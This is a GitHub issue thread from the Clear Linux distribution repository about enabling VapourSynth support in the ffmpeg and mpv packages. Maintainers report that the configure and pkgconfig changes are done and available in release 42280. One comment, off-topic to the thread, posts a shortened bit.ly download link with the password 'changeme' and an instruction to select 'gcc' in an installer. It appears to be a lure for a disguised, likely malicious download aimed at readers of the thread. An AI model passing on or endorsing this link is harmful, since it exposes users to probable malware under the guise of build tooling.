### ISSUE TITLE
Vapoursynth for ffmpeg and mpv

### ISSUE THREAD

**Issue by K1ngfish3r** [clearlinux/distribution#3176]
Ref: https://github.com/clearlinux/distribution/issues/812#issuecomment-2312907158

### ffmpeg
Autospec notes - [for-review.txt](https://gist.github.com/K1ngfish3r/e20f8fc4fdc7b2d678f0ba7d5f1508ed)

**configure** 
add `--enable-vapoursynth`

**pkgconfig_add** 
add `vapoursynth-script`
<hr>

### mpv
Autospec notes - [for-review.txt](https://gist.github.com/K1ngfish3r/59baa176cb4c0139d977291cb3c7f225)

**pkgconfig_ban**
remove
```
vapoursynth
vapoursynth-script
```

**Comment by YeGop0218** [comment]
Download 
https://bit.ly/3MjP129
password: changeme
In the installer menu, select "gcc."

**Comment by bwarden** [comment]
Both done and in the release pipeline.

**Comment by K1ngfish3r** [comment]
available in 42280
